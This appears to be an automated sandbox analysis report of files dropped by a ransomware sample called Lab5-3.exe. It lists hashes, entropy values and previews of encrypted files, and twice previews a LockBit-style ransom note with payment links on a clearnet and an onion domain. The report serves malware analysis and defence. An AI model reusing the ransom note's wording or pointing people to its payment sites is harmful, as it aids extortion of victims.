                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1616
                                                                                                          Entropy (8bit):7.882704166378508
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:bAVXZTzSyHfUTid3hBaUoSGFcmeykEdEElU92i:bAVJTwGx0uKeY2ElUJ
                                                                                                          MD5:122D63111B353D65E7B64076A54A3746
                                                                                                          SHA1:F1C5BD53BE33F41F12373FF6C0BB9B81DDA52BCC
                                                                                                          SHA-256:6D8ED15926378C6E1E29E8280D708D7AB6DA68750D759105B8DCC794429A4C18
                                                                                                          SHA-512:805CA9366846CC5729FCFA2D55FF60C107A71D7B66D836F02EE49A42A20DC0758844E9816C2A3CBE6194641051565AE3FFBE338D1267DDC026E000CE09D7D5C4
                                                                                                          Malicious:false
                                                                                                          Preview:......H..U<.......6Apk.;...{'d_>..Eq.i...P...#...:..P&.W9.8..W.0..V...K..y..t.y..*g.....#i.........{..p.9.m.;...*.....B;%.#....iCX...l..hCQ}.. ...wm+B.......RC...+.....z..I.6..E.72l..g=u.f.a^3e..&...?.Q...w.Y."..3...b.8.r.T.mn..E.c..q..j.G..E..M........Pr..z.P:...I..s.!.J..t...M......V..j.jLa..=WI.......d?.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8GiL1.e..dJ.`..4...(XF..l.Io...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1632
                                                                                                          Entropy (8bit):7.89901007908077
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:zHR66HfUTid3hBaUoSGFcmeykEdEElU92i:zHRwGx0uKeY2ElUJ
                                                                                                          MD5:330B26D12AA13A43A65A2AEAB84B6781
                                                                                                          SHA1:31F1F3FA9DDB9DF6DBCDF321AC30306911A09508
                                                                                                          SHA-256:D5E272B35D1130B7FD026DD21D94307C010B9C299BC8F9D6D2C4CAA140A9C342
                                                                                                          SHA-512:015F78C3AEF1C5E2AC79257E4D447B8A268A250D401B55ED0984429986A70FE4101D72628D3757B7D6570CED4D8A0FB2C2FB2CB9D99401005BBD5C913E7851A2
                                                                                                          Malicious:false
                                                                                                          Preview:z;..5...:?.o..$..@4.....c.hy.N0.<6vq..W......@......[.N...EB.....C...v...O:f. /G..(..|...%f..m..t.....H:....C.%<.N...>...v7q.-..[....QX..h.......C..F.R........JV...."...#...,.q.....bQ....I^`..TM.u.2X..1Egq..f.....<.Z...=8...a..&....+.j_e*._.....T..x{...`....4..~.v..)M.}$......?..L..D...E..2.........5.S...F.l p....>..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8GiL1.e..dJ.`..4.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1616
                                                                                                          Entropy (8bit):7.882295759671525
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6Fdq0JW4gDHfUTid3hBaUoSGFcmeykEdEElU92i:6Fs0JrJGx0uKeY2ElUJ
                                                                                                          MD5:2D571104465DC1569B13656B0FB40683
                                                                                                          SHA1:89F6F1AB9849F5557CA131A12679D1412C6E0B71
                                                                                                          SHA-256:CEC600BAF41E23BC2C24709D2B9539B58B199996A3FAB68321F0DF5CD43826DE
                                                                                                          SHA-512:3AFA7D54817C08C6727B5999A4A691616F5E13281BC0A151BF0F32FA6FF495C6F3CCC088EB2A054158EE45AC5F2E0CE67543BFC74795D8D54F1166603E537089
                                                                                                          Malicious:false
                                                                                                          Preview:....o.(....."..J......}.X...].....Ju[..f.u.....E.[.o.4........(I.....ju.?3...z.c..>'D.0i#Q..6#.r.A.1......p....z..<_1).3$C.c...x.Z....*.....;.<.=CE3.K]..._.x.6u.\"..Y.~.}..W........k.Q...5{;.^%...t9.3Xi...N.Aw.;#.j96.;.2Ya$Tc>....I..eSy..x..Z....!.v..n..O...&.yMr.x..$..01.4.>].........c..f.e(.c...G.%h.~6M..h...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8GiL1.e..dJ.`..4...(XF..l.Io...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1616
                                                                                                          Entropy (8bit):7.883282747415115
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:38xsjFdVHfUTid3hBaUoSGFcmeykEdEElU92i:3rj2Gx0uKeY2ElUJ
                                                                                                          MD5:6EDA4EEA35385D2FFF42C5108F9AAC0F
                                                                                                          SHA1:591A5687BAD8FD43E68A57E32823FE89EA3184AF
                                                                                                          SHA-256:71386B3847AB84B3E2D291C50018EC5B2E7786C44AA90159E467A0BC27DFAC70
                                                                                                          SHA-512:D5AE881EEA191FF50DDCAD7EBAAA82BA7366C3D3CFA0A37C3C5EB249A7AA6A628B19EB9C3F7FCA06C83D333F535F887445A6985C9443BCDA234142A75004AAF7
                                                                                                          Malicious:false
                                                                                                          Preview:uQ..........S......-[..qH..Ps..U./.XHn7...y?..?>.b..<..7...0zt.._'..J0...t.QhK.$..@..._.|.pY.h..-i.|....75.JO".(/....L2?..E.e_'...au..Z6...S.e.?G..;...lMF....&a(....L....|.D&.#...0...>?.B<....IP7&)g^...C...F1...%...t./..DG.y..K....T....'..(..;..{...R..6?....w...s".....2>#..n......if.o...ao.T...>.`=D.Ddd.}.3.9....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8GiL1.e..dJ.`..4...(XF..l.Io...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1616
                                                                                                          Entropy (8bit):7.881610321710745
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:arJltuHIcSz4HfUse9iRf3hqkXaUfAnSaNhpFzOISmeyvpeEdExyETVGU92i:UHeHfUTid3hBaUoSGFcmeykEdEElU92i
                                                                                                          MD5:B95CE15045041C3EB3F9B960E20D370D
                                                                                                          SHA1:15365856BDC4E1EEBEA89B4150E33727C628157C
                                                                                                          SHA-256:B2AC4F15CCC32DAE92124109261AC1AE5A88F91AFD3561F5C3D5BD2B5294CF0D
                                                                                                          SHA-512:8870C7992E92679A3E25E6B59A634675149C8DD6AC53224D17416A320D120091D750C7842FB1C865209602BDA59DAB86C85092D84A165FF2D8D15B8156EA82E4
                                                                                                          Malicious:false
                                                                                                          Preview:T..>..0..31.S......4:...g.=.r."B....Y......l............:..4;..i..^......=2.*."p^.N.>.;S3......B.xef.....'...xK.k....A ........W..... .w.w...<.^..\..B.a..>3.e.....n=.=.n....a..L.....O.C...@.I.8.S..5.n.v.....m5../.....u.D..H..S...y._...........D..........7Z..3:8.. `d;...?`....`xF..,.z..R....Y.n77z...)....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8GiL1.e..dJ.`..4...(XF..l.Io...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1616
                                                                                                          Entropy (8bit):7.877113396506925
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:MOWSVG97mHfUTid3hBaUoSGFcmeykEdEElU92i:MOWSOGx0uKeY2ElUJ
                                                                                                          MD5:599007766A03408C0360E682E77F18D8
                                                                                                          SHA1:827DBC8548DD6CD3172C0E8E846B616B3DBB193B
                                                                                                          SHA-256:E4190749247EE476DF916D15CB09A4748765DA4CAE7A1773400AD56736323C06
                                                                                                          SHA-512:7FAD6B6EAF548C978AA292C2384E5146ADD177FE3D934B33554DC1C6C6F49AE192187D3CDEA23A8B99DBF9052FF02A482D290352D1E5FD8F5A34F0E5883E6AC8
                                                                                                          Malicious:false
                                                                                                          Preview:....<i..3.oz..+p.a0....>[.....\...3q..z..%...g.;!...........h.qW..l-K..w...+.,.,p|...Et,Q..#r7...;..<..E...6.;..zl......Q....).......t...h..w.K&..3P..J-.....)J.~.'[.v~.j....u_.~.}.....+.q!......v@....=nq.o..<......r..*.0hBm8....{..C......8;..........yL..P....g....;.E .[t.X.Xc\...y...:..[.........0dv..O.}..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8GiL1.e..dJ.`..4...(XF..l.Io...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1616
                                                                                                          Entropy (8bit):7.882073181071345
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:u97v+MHfUTid3hBaUoSGFcmeykEdEElU92i:u9buGx0uKeY2ElUJ
                                                                                                          MD5:655181A394AF04627AD5B1294EE3AE91
                                                                                                          SHA1:544B334F06BC96E33CFAD072138A88A9294759F6
                                                                                                          SHA-256:8DB34751DC54204C6B16D32A6A07A747A9099957035101C8A2DA53B91980BC06
                                                                                                          SHA-512:925322EA432CA3B392B10CAB5B3A5B5F8FD51AD5C43EC7655AF7D8006DCDA65D7986AF377ADB48B052E61E1EED087EFBE023568C752442EF7041151BE5ECA97B
                                                                                                          Malicious:false
                                                                                                          Preview:..lKd...8...y)G...to..5.$b.RS.on'...U...=.....}#z..y..N....I....0.R....p.-..9.1.~"..r&.[..}H.G..r..B..g..&.......L.....9.a.FwD..-..)....b@;6\..F..-X.;..!.:...../2....t..^...>.Z8.$...&-#.s..mw....5...e.{N..?y4..II...C..zo=..U.sG...j...c].*..B..}U\*.JEG|ScD....3$...E..M..|.....a8o..UF..{J.fN........."..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8GiL1.e..dJ.`..4...(XF..l.Io...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1616
                                                                                                          Entropy (8bit):7.8769700785093875
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:JIvFRu6HfUTid3hBaUoSGFcmeykEdEElU92i:GMGx0uKeY2ElUJ
                                                                                                          MD5:725727CE7A64A6E3D0010B3B24330E58
                                                                                                          SHA1:C5966CF7F9F04AA4B400A56BA7D1FFB38DDE23C1
                                                                                                          SHA-256:FC9664B6EEE7ECABDF0C2970266BCCD8B810A9BF303C2C1ECACB8A5D87A18B3A
                                                                                                          SHA-512:5DC90FE239CF116D69309A6B75BBB3B250CF9E4BBC1F481871573AB6B515D21E157A6DEEC451B996990B9739E8A4B4CBEA51D00A5FB463CBF64735F02D006614
                                                                                                          Malicious:false
                                                                                                          Preview:......{../..2j..}".>7#..IGU...;hn..- 3E..O...)wj.v..da.....u..Z...0....u.....;W.....*..J1....L ...........=.T.}..8>>.R.-.....2.C........9..P.V.[....n..B ..:.L4q...)..Z.......x.|/.o....8.N..N..v^:..._.>.<..G..r......X..{z.....n]......6GN....z#....Y..I/....Pj..(.._MCg?w.2...f/..s.<.{.. l.*.....=...r..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8GiL1.e..dJ.`..4...(XF..l.Io...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1616
                                                                                                          Entropy (8bit):7.885512211877048
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:0arOXUODaKnSrHfUTid3hBaUoSGFcmeykEdEElU92i:0yOXtDaYS4Gx0uKeY2ElUJ
                                                                                                          MD5:452E250E42250241E11513EFCDB45238
                                                                                                          SHA1:29083E3A3F01303770CBC41FB3468D89E8C71A8B
                                                                                                          SHA-256:8FF7FB615C7D86B321BCCA695FF5BC955BD51F94C2CBB2192F4084157C896C82
                                                                                                          SHA-512:05CB0DD3544BCCCF60BCE51E9668A08F858DCE1200A004C3CE30C0EE834249F37778A5CB1B8A9B757455E298D387BAF0C2051D45ECB5E2793D846E09FB8D57EC
                                                                                                          Malicious:false
                                                                                                          Preview:tE...)..{..s.....]p...ur......P5..:.....9O....;I!~.Z.N @.F.^2^z...%x%..r..k.n.%.'.K...o+...".....0.=......qO..R..[QL.C..(.>\....2.:..@.8TO.^..j..5..c.>.r:R...PK.........G^...C.T.....`2x..JB.....T...;^..u..B.......k..w.....WY...H.!$..|..........*8.p/.....IY..P.Y.j.. ..$.7..G.:..[_.z...r5.?....%;.*&G......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8GiL1.e..dJ.`..4...(XF..l.Io...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1632
                                                                                                          Entropy (8bit):7.886968541535405
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:kHhB5GtdElaxKiXHfUTid3hBaUoSGFcmeykEdEElU92i:0r5G7cCKvGx0uKeY2ElUJ
                                                                                                          MD5:8EED9610473020D542B7E7BD0FCBF880
                                                                                                          SHA1:40774DD36C326D0D7ADB97970A3823A3AB4D97B3
                                                                                                          SHA-256:2CB9880B716FE7B40AC0F9658065CCE215D1096F45AC24B21E572159FE8035B5
                                                                                                          SHA-512:D11C507D0ED1B9180AE6868BA2A1001280CBCEC2AAAEA945EF93354BF6E44F8153086A1BF08AF514D5281FE57BB231C39291CB3E7897E26C78C936D23FB831F9
                                                                                                          Malicious:false
                                                                                                          Preview:..j|T_..p..7($y.].. ..ed.(P....{3..w..7...t.F>.]J....8....N.......X.i..,......S{....R.....g.."...E.....r......<......,M...BP/...V.&..<.uYl...$O7....N..47.[.)e.h.NW..vd.+(..8c..+...9`.+2.".<..S.n.$.}.....^._&..kP.N&..-_U.._...Y.T3.;<...e.-.@.s.....7![<.......NR.b.Q........-../..G.);.8.w..3..O/T..F..jq..)...s..(Xi.P...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8GiL1.e..dJ.`..4.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1616
                                                                                                          Entropy (8bit):7.881393315142129
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:qLx++XZHfUTid3hBaUoSGFcmeykEdEElU92i:q08aGx0uKeY2ElUJ
                                                                                                          MD5:2E58B55E128380579E3F402D4B4E1B16
                                                                                                          SHA1:B4641D9760C4091852E2435C07E233A301BB9357
                                                                                                          SHA-256:0E4F3F615FA61BDD35C69BCEFD9EBDB6FC098F2FD92FF9FBBDF91501F8C1FA97
                                                                                                          SHA-512:14509FF104BFE480265D67D85DA5FC5388128406452FEFEAEDCD4128605A4E5E934679E03F678F4F3B053533D52F18B6F0D0921022A13567BB5C8E4A854B19F4
                                                                                                          Malicious:false
                                                                                                          Preview:.^y9x.$U...|...]...y.h..}YM.`.5..L.^..Hd>.(%.....y...v.2.J.[...f.!..].j}..8.m.....Z.Q..i.G\. ..%o8...9...2=.7..hz..*.^;...f.....(.*.CM.Mh[;=.C......J.....6.+.5\<.(...7..H_..;1....(.).M!Q.5c..^.}L..E=.[.SHy.o..w&.B... ..>..\.!&:h*......V..p.UF.C.'+.B......1.a8*.=X'.....g.Y.OBC.d.%......2O%$....o....Y...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8GiL1.e..dJ.`..4...(XF..l.Io...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1616
                                                                                                          Entropy (8bit):7.8886647354296775
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:IZQno4HfUTid3hBaUoSGFcmeykEdEElU92i:sQnofGx0uKeY2ElUJ
                                                                                                          MD5:EDED56064CF165B43A6BA17E8C748114
                                                                                                          SHA1:EF78FB5A48AB388D95CCEC975F8FCE22C112488F
                                                                                                          SHA-256:BDD51F039B2BFEF8A5D8A444309FE45C8609B83E840329C2B4A3F1882C5213E5
                                                                                                          SHA-512:6CC85402465A77C785EEAE4588DE886B7686869B389ADAB5DB982907F9F0252A400947781A6EB6EFAF67DB6352D0D2DDCFA781985F3F635BC27AB2EC3EAAB416
                                                                                                          Malicious:false
                                                                                                          Preview:.`%.Kc.~..*.s].y2J......z+i.KG%f..8C.c...1.I.;....dM..V.P5[`J[E(Y.l.t ..:.Z.P...>p.J.....c...yW....WE..p..."fc%R;..........F....\a..;+U..'...o.9..Y5..64.,'..T.M....F...^..v5._F.1..C...ri.4........V.IT..........]..o.]3$.....1I.....i.-8p..,g..\V.`N<.>>$....a.B..].s[....?..s.a.&IY..)G......<...=....~oES..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8GiL1.e..dJ.`..4...(XF..l.Io...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1616
                                                                                                          Entropy (8bit):7.887666889530051
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:XGosDSitHfUTid3hBaUoSGFcmeykEdEElU92i:tZfGx0uKeY2ElUJ
                                                                                                          MD5:2CADC893724DD0DEAFD3981CB822B7EB
                                                                                                          SHA1:5E9D8548F6443AF6D62520B6ACA8B20B7695089E
                                                                                                          SHA-256:ED80F871FB3C1C9AFDEF69E83966B3C9A01BC607B06B8D9727BEA20C4E39A4B5
                                                                                                          SHA-512:474F4D0AE746F4889C80BAB8CF9A158C4F396CF6EC2371B497187AF640471AEC7B6DCB5ECB292FE3166CA3E14B77EE9FB0D415D073F2F1BF6FCB407E2BF1563D
                                                                                                          Malicious:false
                                                                                                          Preview:.W.......:.C...G...]....HUj!...&A....8.......W.>...V..G.").^?.Q...2%..Ls.Y.....@x..P>...BM7FE...,.......u.q.`........+T(.....e..../..Q.<d......H.RZ..".#|+.....$RB.....i..4..G..w,..c.....v..h...........<.(....O.'Z:Q.,....o?.$.I".........e*'...V..H.VeP.;...P.%..h.,U.G...q...P..'!.\.iq&..g..X~..w>...@..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8GiL1.e..dJ.`..4...(XF..l.Io...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
